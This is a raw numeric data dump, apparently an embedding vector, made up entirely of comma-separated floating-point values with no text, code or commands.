0.011098944582045078, 0.028217900544404984, 0.00928863137960434, -0.005912253633141518, -0.018677836284041405, 0.02945351041853428, 0.017269814386963844, -0.023605911061167717, 0.004274351056665182, -0.030401770025491714, -0.011774220503866673, 0.00822543166577816, 0.07689521461725235, -0.048677314072847366, 0.02613460272550583, -0.024094408378005028, 0.014913533814251423, -0.010689469054341316, -0.012449496425688267, 0.006752755958586931, 0.0057649859227240086, -0.006573161575943232, -0.006889247801154852, 0.00925271213054657, 0.00911622028797865, -0.03267184644937515, -0.030028212815523148, 0.03453962877392769, -0.00524416146799922, 0.0012760194949805737, 0.0023131780326366425, 0.006817410234361887, -0.004450353793799877, -0.02020079828798771, 0.007923712953925133, -0.01136474497616291, -0.014389117248356342, 0.012097490951418877, -0.012004101648926735, -0.032010938972234726, -0.04985545575618744, -0.02196800895035267, 0.01956862583756447, 0.014223890379071236, 0.02752825617790222, 0.014001193456351757, -0.0010766694322228432, -0.01850542426109314, -0.014051479287445545, -0.009489777497947216, 0.0171548742800951, 0.04160847142338753, -0.00995672307908535, -0.019353112205863, -0.01737038791179657, -0.04333258047699928, 0.0008364617242477834, 0.02548806183040142, 0.038591284304857254, -0.0505450963973999, -0.01246386393904686, 0.00196656072512269, -0.004321045707911253, -0.011034291237592697, 0.019726667553186417, 0.008979728445410728, 0.0008162573212757707, -0.03341895714402199, -0.010351831093430519, 0.000609274604357779, 0.00022830961097497493, -0.04442451521754265, 0.005046607460826635, -0.02301684021949768, 0.01115641463547945, -0.01211185846477747, 0.007586074993014336, 0.029123056679964066, -0.04321764037013054, -0.0022682794369757175, 0.02936730533838272, -0.0320684090256691, -0.029108688235282898, -0.005520737264305353, -0.026019662618637085, -0.03405113145709038, 0.02103411592543125, -0.03140749782323837, 0.032010938972234726, -0.03833266720175743, -0.002341913292184472, -0.015287090092897415, -0.029970742762088776, -0.004888564348220825, 0.017054300755262375, -0.09425123035907745, 0.03037303499877453, 0.006943126209080219, -0.004443170037120581, -0.0010003418428823352, -0.007176599465310574, -0.00018262524099554867, -0.008426577784121037, -0.03264310956001282, -0.006792266853153706, 0.02047378197312355, 0.0035164617002010345, -0.009001280181109905, 0.020430678501725197, 0.012981096282601357, 0.008943810127675533, -0.033304017037153244, 0.015344561077654362, 0.01048113964498043, 0.01504284143447876, 0.008548702113330364, -0.0011089964536949992, 0.0010416485602036119, -0.004963994026184082, 0.01722671091556549, -0.03474077582359314, 0.010940901935100555, -0.035028126090765, -0.022973738610744476, -0.005984091199934483, 0.02140767313539982, -0.02160882018506527, 0.0025412633549422026, -0.005610534455627203, -0.023261088877916336, -0.008879155851900578, -0.008254166692495346, 0.002467629499733448, -0.011767036281526089, 0.017988191917538643, -0.01489916630089283, -0.025028299540281296, -0.005682372488081455, 0.04482680559158325, -0.02188180387020111, 0.02251397632062435, 0.010574528947472572, -0.014604630880057812, 0.02089044079184532, 0.023476602509617805, -0.032872989773750305, 0.02698228880763054, -0.03226955235004425, -0.0031069861724972725, 0.023534072563052177, -0.03537294641137123, 0.016652008518576622, 0.01616351120173931, -0.02994200773537159, 0.06315982341766357, -0.04272914305329323, -0.013017014600336552, -0.023289823904633522, 0.02768629975616932, -0.030200624838471413, -0.062240295112133026, 0.006806634366512299, 0.0245110671967268, -0.02203984558582306, 0.021939273923635483, 0.03692464530467987, -0.054539281874895096, 0.02719780243933201, 0.012233982793986797, 0.02061745710670948, 0.011573074385523796, 0.005007096566259861, 0.04548771306872368, 0.0030441281851381063, -0.04132112115621567, 0.03077532723546028, -0.01892208494246006, 0.05028648301959038, -0.012708112597465515, -0.009856150485575199, -0.005456083454191685, 0.023146148771047592, 0.029123056679964066, -0.01821807399392128, -0.001343367388471961, -0.02633574791252613, 0.044654395431280136, -0.021479511633515358, 0.0015463093295693398, 0.014841696247458458, 0.023993834853172302, 0.03255690634250641, 0.04933822154998779, -0.013706658035516739, 0.0032829889096319675, 0.013246895745396614, -0.028634559363126755, 0.0016810052329674363, -0.004152226727455854, -0.0012867951299995184, 0.005186691414564848, 0.005872742738574743, -0.02804548852145672, -0.02012895978987217, -0.05626338720321655, -0.013742577284574509, -0.014942268840968609, -0.02413751184940338, 0.04359119385480881, -0.02422371692955494, 0.0011440174421295524, 0.024898992851376534, -0.021062852814793587, -0.020732397213578224, -0.029338570311665535, -0.01976977102458477, -0.020445046946406364, -0.008175144903361797, 0.03120635449886322, 0.007449583150446415, -0.010057296603918076, 0.019123230129480362, -0.003807405009865761, 0.011386295780539513, 0.01299546379595995, 0.04060274362564087, 0.02018642984330654, -0.003430256387218833, 0.022470872849225998, 0.004216880537569523, -0.005046607460826635, 0.028275370597839355, 0.02492772787809372, -0.018031295388936996, -0.009841782972216606, -0.0039007943123579025, 0.0012984687928110361, 0.02209731750190258, 0.009080301970243454, 0.04025791957974434, -0.025330018252134323, -0.007237661629915237, 0.03071785718202591, -0.019238170236349106, -0.02929546684026718, -0.012226798571646214, -0.04962557181715965, 0.004655091557651758, -0.02873513288795948, -0.012614723294973373, 0.01581869088113308, -0.012722480110824108, -0.012061571702361107, -0.01843358762562275, -0.0004150879685766995, -0.017815781757235527, 0.00007340928277699277, -0.0001015270609059371, -0.030315564945340157, -0.01872093789279461, -0.025588635355234146, 0.009662188589572906, -0.0001883498189272359, -0.0070724342949688435, 0.0005962540162727237, 0.03494191914796829, 0.017542798072099686, 0.007887793704867363, -0.03192473202943802, 0.04336131364107132, -0.013850334100425243, 0.023462235927581787, -0.03169485181570053, -0.03933839499950409, 0.021867435425519943, -0.008606172166764736, -0.011616176925599575, -0.023404765874147415, -0.004145042970776558, -0.0070580667816102505, -0.02238466776907444, -0.02915179170668125, -0.01115641463547945, -0.0024640376213937998, -0.023548441007733345, 0.007137088570743799, 0.022355932742357254, -0.008318820968270302, -0.009913620539009571, -0.012133409269154072, 0.004346188623458147, 0.03347642719745636, 0.0022341564763337374, 0.031033942475914955, 0.0022233808413147926, 0.006483364384621382, -0.011946631595492363, -0.015272722579538822, 0.009051566943526268, -0.001170058618299663, 0.04364866763353348, 0.002433506539091468, -0.008627723902463913, -0.024194981902837753, 0.005251345224678516, -0.013519879430532455, -0.023462235927581787, 0.0028968604747205973, 0.056033506989479065, -0.04172341153025627, -0.003085434902459383, -0.05275770276784897, 0.02393636479973793, 0.008943810127675533, 0.020861705765128136, -0.0032686213962733746, -0.013304365798830986, 0.007923712953925133, 0.015804322436451912, -0.002859145635738969, 0.003002821234986186, -0.009044382721185684, 0.03008568286895752, -0.01729854941368103, 0.02054562047123909, 0.02380705624818802, 0.005402205046266317, -0.01708303578197956, -0.009489777497947216, 0.005937396548688412, -0.011278538964688778, -0.003365602344274521, 0.016695111989974976, 0.007988366298377514, 0.016853155568242073, -0.02132146805524826, -0.017312917858362198, -0.0004294555401429534, -0.0028232268523424864, 0.029769597575068474, -0.021594451740384102, -0.013922171667218208, 0.030200624838471413, -0.0024299146607518196, 0.015315825119614601, -0.015919262543320656, -0.02041631191968918, 0.036608558148145676, -0.03183852508664131, -0.011838874779641628, 0.012233982793986797, 0.02472658082842827, -0.01589052751660347, 0.0057793534360826015, -0.012219615280628204, -0.009841782972216606, -0.006077480502426624, 0.004141450859606266, 0.0060307858511805534, -0.015933630988001823, -0.011788588017225266, 0.004615580663084984, -0.017456592991948128, 0.01616351120173931, -0.008311636745929718, 0.016652008518576622, 0.006591120734810829, -0.0234335009008646, 0.019381847232580185, 0.013642003759741783, -0.01624971814453602, -0.017700841650366783, 0.016335923224687576, 0.011925079859793186, 0.009417939931154251, -0.025861619040369987, 0.03649361804127693, 0.009647821076214314, 0.0016810052329674363, 0.05091865360736847, -0.0034859306178987026, 0.015703748911619186, -0.0015858201077207923, 0.02959718555212021, -0.014389117248356342, -0.004098348319530487, -0.0023203620221465826, -0.008742664009332657, -0.03976942226290703, 0.03324654698371887, 0.011853242293000221, 0.01380723062902689, -0.0014744715299457312, 0.003886426566168666, 0.0020330105908215046, 0.015775587409734726, -0.02449670061469078, -0.043878547847270966, 0.04005677253007889, 0.0044288020581007, -0.019798506051301956, -0.029625920578837395, 0.014065846800804138, 0.027140332385897636, 0.005014280788600445, -0.005434531718492508, -0.02237030118703842, 0.0066018966026604176, -0.00630017789080739, -0.016264084726572037, -0.012456679716706276, -0.021235262975096703, 0.006813818123191595, 0.004902931861579418, -0.01630718819797039, 0.011278538964688778, 0.011774220503866673, -0.02458290569484234, -0.0032632334623485804, -0.0047089699655771255, 0.008347555994987488, 0.009856150485575199, -0.03126382455229759, 0.02698228880763054, 0.0446256585419178, -0.023390397429466248, -0.024051304906606674, -0.016910625621676445, -0.027011023834347725, -0.02104848437011242, 0.009030015207827091, -0.0003436991246417165, 0.006124175153672695, -0.03106267750263214, -0.025444960221648216, 0.013297182507812977, 0.003080046968534589, 0.006562385708093643, -0.04801640659570694, 0.01317505817860365, 0.03284425660967827, 0.0004085776745341718, -0.024252451956272125, 0.013419306837022305, 0.016838787123560905, -0.019468052312731743, 0.014360382221639156, 0.013950906693935394, 0.004834685940295458, -0.0058224559761583805, 0.010200971737504005, -0.01186042558401823, 0.0035936874337494373, -0.01557444129139185, -0.0038181806448847055, -0.033074136823415756, -0.05247035250067711, 0.00928863137960434, -0.010984004475176334, 0.01870657131075859, 0.016436494886875153, 0.010373382829129696, -0.034281011670827866, 0.0060128262266516685, -0.01632155478000641, -0.01892208494246006, 0.0049999128095805645, -0.015789955854415894, 0.008347555994987488, -0.0007129904697649181, -0.008527150377631187, 0.016220981255173683, 0.024022569879889488, -0.004195329267531633, -0.002814247040078044, 0.03215461224317551, -0.006350464187562466, -0.02902248315513134, 0.014884798787534237, -0.03304540365934372, 0.023893263190984726, 0.00040925113717094064, -0.011149231344461441, 0.010100399143993855, -0.008943810127675533, -0.0015130842803046107, 0.007413663901388645, 0.004701786208897829, -0.0003115965810138732, -0.03183852508664131, -0.02393636479973793, 0.007255620788782835, 0.0026597955729812384, -0.009906437247991562, 0.011810139752924442, 0.022413402795791626, 0.0010084235109388828, 0.016637641936540604, -0.02337603084743023, -0.008318820968270302, 0.016062939539551735, -0.013972458429634571, -0.010215339250862598, -0.0023490970488637686, -0.03807405009865761, -0.002131787594407797, 0.00946822576224804, -0.007255620788782835, -0.0031249455641955137, -0.013900619931519032, -0.04313143342733383, -0.007022147998213768, -0.01814623549580574, 0.008670826442539692, 0.004389291629195213, -0.0061636860482394695, -0.00005219467493589036, 0.01849105767905712, 0.006307361647486687, 0.018548527732491493, -0.038246460258960724, -0.007201742380857468, -0.008160777390003204, 0.029424775391817093, 0.014554344117641449, 0.008922258391976357, 0.0023490970488637686, -0.007600442506372929, 0.0034571955911815166, -0.009920804761350155, 0.029281100258231163, 0.026867348700761795, -0.013620452955365181, 0.02492772787809372, -0.023965099826455116, 0.015071576461195946, -0.009044382721185684, 0.014705203473567963, -0.02357717603445053, -0.004443170037120581, -0.015344561077654362, 0.028763867914676666, -0.013814414851367474, -0.02252834290266037, 0.024238083511590958, 0.03333275392651558, 0.01623534969985485, -0.01905139349400997, 0.02112032286822796, -0.04853363707661629, 0.00920960959047079, -0.0013855721335858107, -0.00879295077174902, 0.03310287371277809, -0.021149057894945145, 0.012571620754897594, -0.007571707479655743, -0.004601213149726391, 0.004687418229877949, 0.0549415722489357, -0.019654830917716026, -0.007435215637087822, -0.010373382829129696, -0.0024083631578832865, 0.01702556572854519, -0.046004947274923325, -0.027011023834347725, 0.010775674134492874, 0.023605911061167717, -0.026953553780913353, -0.037183262407779694, -0.009195242077112198, 0.010897798463702202, 0.024309922009706497, 0.01175985299050808, -0.020646192133426666, 0.004231248050928116, -0.00727358041331172, -0.003810996888205409, 0.021867435425519943, 0.01048113964498043, 0.010021377354860306, -0.004594029393047094, -0.006461812648922205, -0.022011110559105873, 0.00836910679936409, 0.010466772131621838, -0.005923029035329819, 0.012851787731051445, -0.03600512072443962, -0.023921998217701912, 0.03198220208287239, -0.009662188589572906, 0.033706311136484146, 0.017456592991948128, 0.015488236211240292, 0.016206614673137665, -0.0024927726481109858, -0.020516883581876755, -0.0047089699655771255, 0.026249542832374573, 0.0006020907894708216, 0.059136901050806046, 0.01464773342013359, -0.0035775238648056984, -0.03339022397994995, 0.04341878369450569, -0.04020044952630997, 0.016335923224687576, -0.021307101473212242, -0.021364571526646614, -0.014460955746471882, -0.03402239829301834, -0.018677836284041405, 0.002591549651697278, 0.011163598857820034, -0.013038566336035728, 0.02965465560555458, 0.016292819753289223, -0.0003506584034767002, 0.018548527732491493, -0.005366285797208548, 0.0006052337121218443, 0.0025646104477345943, -0.0142957279458642, 0.0061924210749566555, -0.016350289806723595, 0.026809878647327423, 0.0003825364401564002, -0.03589018061757088, -0.01849105767905712, 0.008807318285107613, -0.012492598965764046, 0.01589052751660347, -0.05132094770669937, -0.01688189059495926, -0.022930635139346123, 0.0037535266019403934, -0.027154700830578804, 0.02140767313539982, 0.02140767313539982, -0.028375942260026932, -0.030028212815523148, 0.020531252026557922, 0.01962609589099884, 0.008570252917706966, 0.0490221343934536, -0.0023993835784494877, 0.00674198055639863, -0.009726841934025288, -0.007614810019731522, 0.017327284440398216, -0.028375942260026932, 0.03091900236904621, -0.019353112205863, -0.03126382455229759, -0.012973912060260773, 0.00840502604842186, -0.0014502261765301228, -0.03419480845332146, -0.005951764062047005, 0.033016666769981384, -0.00042159826261922717, -0.007751301862299442, -0.034712038934230804, -0.02698228880763054, -0.023706484586000443, -0.008175144903361797, -0.007923712953925133, 0.007966815494000912, 0.007406480144709349, -0.02499956451356411, -0.01693936064839363, 0.048677314072847366, 0.015718117356300354, -0.0047233374789357185, 0.0032021712977439165, 0.0018426403403282166, -0.027844343334436417, 0.005926621146500111, -0.028648925945162773, -0.031378764659166336, 0.00736337760463357, -0.014259809628129005, 0.0016388004878535867, -0.010416485369205475, 0.0641368180513382, -0.010502690449357033, -0.0012535701971501112, 0.01942494884133339, 0.03531547635793686, 0.004073204938322306, -0.029568450525403023, -0.011731117963790894, 0.022557077929377556, -0.01666637696325779, 0.027140332385897636, -0.011781403794884682, -0.020085858181118965, -0.010869063436985016, 0.010825960896909237, 0.006953902076929808, -0.018735306337475777, -0.02422371692955494, -0.00159749377053231, -0.020143328234553337, -0.04376360774040222, -0.0007938080234453082, 0.013361836783587933, 0.009051566943526268, -0.009611901827156544, -0.006749164313077927, -0.0041773696430027485, -0.008060204796493053, -0.01794509030878544, -0.013088853098452091, 0.004827502183616161, -0.0311488825827837, -0.04080388695001602, -0.021091587841510773, -0.012751215137541294, -0.03077532723546028, 0.03790163993835449, -0.013929354958236217, -0.018261177465319633, -0.027025392279028893, -0.0007152354228310287, 0.03453962877392769, 0.02272948995232582, -0.017988191917538643, -0.028275370597839355, 0.015287090092897415, 0.01002856157720089, -0.05183817818760872, 0.013203793205320835, -0.02303120866417885, -0.013771312311291695, -0.014051479287445545, -0.034769508987665176, 0.012880522757768631, 0.03657982498407364, -0.014755490235984325, 0.0213933065533638, -0.010545793920755386, -0.008103307336568832, -0.01489916630089283, -0.008634907193481922, -0.011292907409369946, -0.014798592776060104, 0.03298793360590935, -0.016436494886875153, 0.010193788446485996, -0.02196800895035267, 0.01044522039592266, -0.005226202309131622, -0.022628916427493095, -0.022212257608771324, 0.016910625621676445, 0.010121949948370457, 0.008038653060793877, -0.04597621038556099, 0.031321294605731964, 0.015373296104371548, -0.011400663293898106, -0.019956549629569054, 0.0022592998575419188, -0.032298289239406586, -0.010279993526637554, -0.01624971814453602, 0.0006676428602077067, 0.013103220611810684, -0.010459587909281254, 0.019884711131453514, 0.005028648301959038, 0.0001372776023345068, -0.007420848123729229, -0.016005469486117363, -0.019582992419600487, 0.0021228077821433544, 0.01778704673051834, 0.0035146658774465322, -0.0008786664693616331, -0.0018300687661394477, 0.013685106299817562, 0.008304453454911709, 0.017772680148482323, 0.049884188920259476, -0.008627723902463913, 0.004845461808145046, -0.01864910125732422, -0.009554431773722172, 0.010222523473203182, 0.03657982498407364, 0.0018390484619885683, -0.0028411862440407276, 0.0015400234842672944, 0.022427771240472794, 0.02061745710670948, 0.013088853098452091, 0.0014349606353789568, 0.02584725059568882, -0.024827154353260994, -0.005671596620231867, 0.0317523218691349, -0.01119233388453722, -0.017743943259119987, 0.011953814886510372, 0.0331890769302845, -0.0006770715699531138, -0.0560622438788414, 0.007952447980642319, -0.01083314511924982, 0.02048814855515957, 0.003180620027706027, 0.0020635416731238365, -0.00047502765664830804, -0.02189617045223713, 0.016766950488090515, 0.0034392361994832754, 0.0285914558917284, -0.01672384701669216, 0.021867435425519943, 0.0037750781048089266, -0.0003782710700761527, -0.022355932742357254, 0.009202426299452782, 0.005729067139327526, -0.008211064152419567, -0.02804548852145672, 0.001233814749866724, -0.019037025049328804, -0.0021569309756159782, -0.012528517283499241, -0.009489777497947216, -0.00755733996629715, -0.008304453454911709, 0.02527254819869995, 0.011982549913227558, 0.017356019467115402, -0.014676468446850777, -0.018878981471061707, 0.034999389201402664, -0.023131782189011574, 0.0045473347418010235, 0.0023939956445246935, -0.010603263974189758, -0.01666637696325779, 0.007104761432856321, -0.002893268596380949, -0.010797225870192051, 0.03146497160196304, -0.039165984839200974, -0.01504284143447876, 0.002913024043664336, -0.02294500358402729, 0.014037111774086952, 0.01044522039592266, -0.010107582435011864, -0.016637641936540604, 0.01836174912750721, -0.009410755708813667, -0.03488444909453392, 0.012571620754897594, 0.022988105192780495, 0.08879155665636063, -0.004073204938322306, 0.01920943520963192, -0.01785888522863388, -0.012751215137541294, 0.0011673647677525878, -0.012521333992481232, 0.040344126522541046, -0.004529375117272139, 0.0032362942583858967, 0.033217813819646835, -0.017600268125534058, -0.0038792428094893694, 0.008706744760274887, 0.01341212261468172, 0.03465456888079643, 0.007701015565544367, 0.00534832663834095, 0.016120409592986107, -0.006659367121756077, 0.016623273491859436, 0.0013694086810573936, 0.00448627257719636, -0.0016370045486837626, 0.019927814602851868, 0.002909432165324688, -0.002607713220641017, -0.010610447265207767, -0.018160603940486908, -0.014927901327610016, -0.011221068911254406, 0.005373469553887844, -0.01632155478000641, -0.0010048316325992346, 0.00022617692593485117, -0.0035667482297867537, 0.034712038934230804, 0.008462496101856232, -0.007535788230597973, -0.02456853725016117, 0.002483793068677187, -0.01998528465628624, -0.005606942810118198, 0.003525441512465477, -0.008663642220199108, -0.041062504053115845, 0.03451089560985565, -0.02033010683953762, -0.013792863115668297, -0.021939273923635483, 0.004073204938322306, -0.025531165301799774, 0.024396127089858055, 0.037326935678720474, 0.006188828963786364, 0.030459240078926086, -0.0038505077827721834, -0.016910625621676445, -0.016005469486117363, -0.014381933957338333, -0.008024285547435284, 0.019108863547444344, 0.018261177465319633, 0.007122721057385206, 0.005747026298195124, -0.013685106299817562, -0.03494191914796829, 0.014597447589039803, -0.02025826834142208, -0.0011637728894129395, 0.015833057463169098, -0.015459501184523106, 0.012665009126067162, 0.0035290333908051252, 0.01828991249203682, 0.020732397213578224, -0.0013730005593970418, 0.029625920578837395, -0.03890736773610115, -0.00999264232814312, 0.02768629975616932, 0.013210977427661419, 0.0030872307252138853, -0.0021228077821433544, -0.008455312810838223, 0.027772504836320877, -0.009784312918782234, 0.004615580663084984, -0.015100312419235706, 0.004992729052901268, 0.0008247881196439266, -0.007226885762065649, 0.008448128588497639, 0.008512782864272594, 0.002846573945134878, 0.04399348795413971, 0.011968182399868965, -0.007542971987277269, -0.006077480502426624, -0.019525522366166115, 0.010725388303399086, 0.0038505077827721834, 0.028261002153158188, -0.012313004583120346, -0.02012895978987217, 0.029884537681937218, -0.00214615510776639, 0.01870657131075859, 0.0017914558993652463, -0.0023993835784494877, -0.04080388695001602, -0.03807405009865761, -0.0001781353639671579, -0.02994200773537159, -0.005430940072983503, -0.0003324744466226548, 0.027097228914499283, 0.0018534159753471613, -0.013390571810305119, -0.010682285763323307, -0.018390484154224396, -0.022082949057221413, 0.039079781621694565, -0.002781919902190566, -0.009037199430167675, 0.01879277639091015, -0.02810295857489109, -0.039367131888866425, 0.035200536251068115, 0.032786786556243896, 0.03419480845332146, -0.006727613043040037, -0.0018282728269696236, -0.02047378197312355, 0.023131782189011574, -0.038878634572029114, 0.027140332385897636, 0.021091587841510773, -0.0017833741148933768, 0.00021641147031914443, 0.006680918391793966, 0.027082862332463264, 0.030171887949109077, 0.0016208410961553454, 0.019784139469265938, -0.0006285810377448797, 0.007287947926670313, 0.03281551972031593, 0.013642003759741783, 0.00960471760481596, 0.010380566120147705, -0.02097664587199688, 0.014597447589039803, 0.03649361804127693, 0.0010299748973920941, 0.00879295077174902, 0.012499782256782055, -0.02846214920282364, -0.017284182831645012, 0.014942268840968609, 0.0009383816504850984, 0.019453683868050575, 0.02104848437011242, 0.012858971953392029, 0.0009222181397490203, 0.02196800895035267, -0.012614723294973373, -0.04451071843504906, -0.03086153231561184, -0.025804148986935616, 0.008771399036049843, 0.007621993776410818, -0.021019749343395233, 0.008886340074241161, 0.006285810377448797, 0.017327284440398216, -0.012054388411343098, -0.020373208448290825, 0.02492772787809372, 0.0017941498663276434, -0.0047377049922943115, 0.005258528981357813, -0.01436756644397974, -0.01349114440381527, 0.030804062262177467, -0.03749934583902359, -0.001980928238481283, -0.000245146598899737, -0.024180613458156586, 0.01998528465628624, 0.007259212899953127, 0.024180613458156586, -0.02831847220659256, -0.03091900236904621, -0.020789867267012596, -0.012162144295871258, -0.014496874064207077, -0.026163337752223015, 0.0004083531675860286, -0.007772853132337332, -0.004227656405419111, -0.010014193132519722, -0.018462322652339935, 0.0021874618250876665, 0.012585988268256187, -0.015545706264674664, 0.02788744494318962, 0.016537068411707878, -0.01538766361773014, 0.003652953775599599, -0.01646522991359234, 0.011163598857820034, 0.024654744192957878, 0.015703748911619186, 0.015675013884902, 0.009195242077112198, 0.00676353182643652, -0.026307012885808945, 0.011996917426586151, 0.008448128588497639, -0.014460955746471882, 0.0234335009008646, 0.017054300755262375, 0.007672280538827181, -0.009159323759377003, 0.020100224763154984, 0.04178088158369064, -0.018160603940486908, -0.017672106623649597, 0.006526466924697161, -0.023189252242445946, -0.0008158083655871451, 0.006979045458137989, 0.009863333776593208, -0.0038505077827721834, -0.014611815102398396, 0.013383387587964535, 0.02436739206314087, 0.021853068843483925, -0.02061745710670948, 0.007952447980642319, 0.005265713203698397, -0.03407986834645271, -0.004392883274704218, -0.015718117356300354, -0.0002200033632107079, 0.034223541617393494, 0.0010631999466568232, -0.020373208448290825, 0.03448215872049332, -0.017528431490063667, -0.00021573797857854515, -0.02272948995232582, 0.005380653310567141, -0.0022862390615046024, 0.038246460258960724, 0.015545706264674664, -0.005509961396455765, -0.002528691664338112, 0.005003504920750856, 0.0120759392157197, -0.013828782364726067, 0.000010979121725540608, 0.019310008734464645, -0.022700754925608635, 0.03793037310242653, -0.02471221424639225, -0.008484047837555408, 0.0006433975649997592, -0.005642861593514681, 0.004827502183616161, -0.013886252418160439, -0.008067388087511063, -0.004101939965039492, -0.0030872307252138853, 0.007007780484855175, 0.0032057631760835648, -0.012851787731051445, 0.013476776890456676, 0.001848028157837689, 0.0032614374067634344, 0.061608124524354935, 0.015445133671164513, -0.013656371273100376, 0.0002884737914428115, -0.021594451740384102, -0.044022221118211746, -0.01913759857416153, -0.006228339858353138, -0.022758224979043007, -0.015330192632973194, -0.008326004259288311, -0.00483827805146575, -0.014137685298919678, 0.02034447342157364, 0.0035847078543156385, -0.019755402579903603, 0.030171887949109077, -0.01352706365287304, 0.0034069090615957975, 0.01729854941368103, 0.029855802655220032, 0.011960999108850956, 0.004432394169270992, -0.00924552883952856, 0.0016082694055512547, -0.01879277639091015, -0.024123143404722214, 0.017815781757235527, -0.02711159735918045, 0.007266396656632423, -0.010100399143993855, -0.0068353693932294846, -0.01964046247303486, 0.0012041815789416432, -0.0012302228715270758, -0.010689469054341316, -0.007305907551199198, -0.0036763008683919907, -0.0016091674333438277, -0.003193191485479474, -0.014489690773189068, -0.026493791490793228, -0.025186343118548393, -0.010179420933127403, -0.006997004617005587, -0.001313734333962202, 0.002733429428189993, 0.01306011714041233, -0.01369947474449873, 0.019798506051301956, 0.02301684021949768, 0.016364658251404762, -0.01573248580098152, 0.014741122722625732, -0.0030459240078926086, 0.007284355815500021, 0.03198220208287239, -0.0045617022551596165, -0.014575895853340626, -0.03818899020552635, 0.030631650239229202, -0.011810139752924442, 0.0106966532766819, 0.01489916630089283, 0.0020832971204072237, -0.005786537192761898, 0.013110403902828693, -0.006684510037302971, -0.008498415350914001, -0.01048832293599844, -0.0024640376213937998, 0.0030279646161943674, -0.008678009733557701, 0.007065250538289547, 0.025100138038396835, -0.001248182263225317, -0.007665096316486597, -0.006943126209080219, -0.03439595177769661, -0.008167961612343788, -0.00483827805146575, -0.0026328566018491983, -0.005351918283849955, 0.009410755708813667, 0.00925271213054657, -0.022557077929377556, 0.01778704673051834, 0.013864701613783836, -0.016910625621676445, 0.0014457363868132234, 0.018677836284041405, -0.023074310272932053, 0.014927901327610016, 0.01313195563852787, 0.007492685690522194, 0.007018555887043476, -0.009791496209800243, -0.027427684515714645, 0.02613460272550583, 0.011436582542955875, -0.007722566835582256, 0.004400067031383514, 0.0006070296512916684, -0.04520036280155182, 0.007938080467283726, -0.014712387695908546, 0.0006662958767265081, 0.004583253525197506, -0.01624971814453602, 0.010035744868218899, 0.0038002212531864643, 0.01229145284742117, 0.040142979472875595, 0.012205247767269611, -0.012499782256782055, 0.003462583525106311, 0.022399036213755608, -0.02287316508591175, -0.003922345582395792, 0.029410406947135925, 0.012672193348407745, -0.004647907800972462, 0.022082949057221413, -0.02146514318883419, 0.014346014708280563, -0.01933874376118183, -0.01949678733944893, 0.02520071156322956, 0.007047291379421949, 0.02224099263548851, 0.006404342595487833, 0.04025791957974434, 0.000791114114690572, -0.006257074885070324, -0.0029166159220039845, -0.016680743545293808, -0.0031375172547996044, -0.007736934348940849, 0.009259896352887154, 0.009367653168737888, 0.005549472291022539, -0.012679376639425755, -0.038303930312395096, 0.008519967086613178, -0.005111261736601591, -0.0005419266526587307, -0.012715295888483524, 0.021335836499929428, 0.003600871190428734, 0.011235436424612999, 0.01949678733944893, 0.012528517283499241, -0.007226885762065649, 0.021292733028531075, 0.008994095958769321, -0.005272896960377693, -0.0022844430059194565, -0.0245110671967268, -0.009123404510319233, 0.002830410609021783, 0.011292907409369946, -0.009353285655379295, 0.007377745117992163, -0.0027621646877378225, -0.02103411592543125, -0.015272722579538822, 0.013239712454378605, 0.002370648318901658, -0.0022485239896923304, 0.007801588624715805, -0.006781490985304117, 0.012377657927572727, 0.011616176925599575, -0.0021569309756159782, -0.006404342595487833, 0.015143414959311485, 0.01221243105828762, -0.012700928375124931, 0.004798767156898975, 0.0032506617717444897, -0.023261088877916336, 0.034625835716724396, -0.0018731714226305485, 0.0018623957876116037, 0.014618998393416405, -0.017470959573984146, 0.005387837067246437, -0.01468365266919136, -0.03517180308699608, 0.021163424476981163, -0.018476689234375954, -0.00014266544894780964, 0.0015534930862486362, 0.000013778271750197746, -0.017255447804927826, 0.002370648318901658, -0.009575982578098774, 0.002641836181282997, -0.0010147093562409282, 0.005208242684602737, 0.005420164205133915, 0.001752843032591045, 0.011889160610735416, -0.001421491033397615, 0.03215461224317551, -0.007930896244943142, -0.008713928982615471, 0.0020815010648220778, 0.007162231486290693, -0.0009931579697877169, 0.012384842149913311, -0.005707515869289637, 0.0078087723813951015, 0.010279993526637554, -0.002372444374486804, -0.01344804186373949, 0.020085858181118965, 0.02711159735918045, -0.0023652606178075075, -0.006943126209080219, -0.0012598559260368347, 0.012492598965764046, 0.00018273747991770506, 0.007643545046448708, -0.016910625621676445, -0.0032165388111025095, 0.0030082091689109802, 0.022183522582054138, -0.013419306837022305, 0.004109123721718788, -0.0007542972452938557, 0.00316086458042264, 0.01893645152449608, 0.014482506550848484, 0.008965360932052135, -0.01132882572710514, 0.0032650292851030827, 0.0007062556687742472, -0.003541605081409216, 0.0025358754210174084, 0.011917895637452602, 0.0007129904697649181, -0.015459501184523106, -0.011587441898882389, 0.006152910180389881, -0.0025807740166783333, 0.013289998285472393, -0.007054475136101246, -0.003379969857633114, 0.011285723187029362, -0.012823052704334259, -0.0035936874337494373, -0.02089044079184532, 0.0012607539538294077, -0.0051364051178097725, 0.022284094244241714, -0.01469083596020937, 0.010754123330116272, -0.015488236211240292, 0.014590263366699219, 0.010904982686042786, -0.004493456333875656, 0.023850159719586372, -0.0017007606802508235, -0.010014193132519722, 0.010014193132519722, -0.010359015315771103, -0.0013460613554343581, 0.008333188481628895, 0.012219615280628204, -0.006289402022957802, -0.0030171889811754227, -0.02719780243933201, -0.007392112631350756, 0.008778583258390427, -0.013239712454378605, -0.0064582210034132, -0.000877768499776721, 0.0202726349234581, -0.00920960959047079, -0.006842553149908781, 0.008376291021704674, 0.009683739393949509, -0.009130588732659817, 0.0027962876483798027, -0.002465833444148302, 0.019812874495983124, -0.008642091415822506, -0.020028386265039444, 0.007054475136101246, -0.0026166930329054594, -0.010351831093430519, 0.0011404255637899041, -0.01560317724943161, -0.005592575296759605, 0.008886340074241161, -0.014798592776060104, 0.008850420825183392, -0.0010919349733740091, 0.02117779292166233, 0.01433164719492197, -0.013333101756870747, -0.004805950913578272, -0.00032259675208479166, -0.01175985299050808, 0.009087485261261463, -0.00240117940120399, -0.04517162963747978, 0.007471134420484304, 0.0014789613196626306, 0.015057208947837353, -0.01645086333155632, -0.0049604023806750774, -0.006659367121756077, -0.013117588125169277, -0.024065673351287842, -0.00920960959047079, 0.005276488605886698, 0.001012913417071104, -0.02011459320783615, 0.019683565944433212, -0.015516971237957478, -0.00487060472369194, -0.0008580131107009947, 0.008850420825183392, 0.025861619040369987, 0.016608906909823418, -0.017600268125534058, -0.0311488825827837, -0.006005642469972372, -0.00632172916084528, 0.0014044295530766249, -0.004001367371529341, 